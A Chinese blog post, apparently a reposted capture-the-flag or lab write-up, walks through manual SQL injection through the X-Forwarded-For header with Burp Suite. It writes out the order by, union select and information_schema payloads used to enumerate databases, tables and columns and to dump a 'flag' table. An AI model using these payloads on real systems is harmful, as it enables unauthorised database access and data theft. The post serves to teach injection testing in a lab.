HTTP頭注入漏洞測試(X-Forwarded-for)--手動注入


手動測試XFF注入漏洞

1、打開頁面是這樣

 

 

2、使用burpsuite 構造XFF看看,添加x-forwarded-for:后提交,頁面發生變化,存在漏洞:

 

 

 3、使用order by 1到5發現到5時出錯,證明有4個字段

 

 

 

 

 

 

4、 使用union select 1,2,3,4判斷注入點,2,3,4都可以注入

 

 

  5、爆出當前數據庫,版本和用戶

 

 

 6、通過union select 1,schema_name,3,4 from information_schema.schemata limit 0,1並不斷嘗試1,2 2,3 3,4 4,5遍歷出所有數據庫為:

 

 

 

 

 

 

 

 

 

 

 

  ps:沒有了!!!

 

 

 7、查看有哪些數據表在當前庫,前提要database()是當前庫

 

 

 

  PS:類似在本地mysql數據庫中查看操作,如果未指定庫就是NULL

 

 

 8、通過union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name='flag')查看列

 

 9、最后通過union select 1,2,3,(select group_concat(flag) from flag)得到flag

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM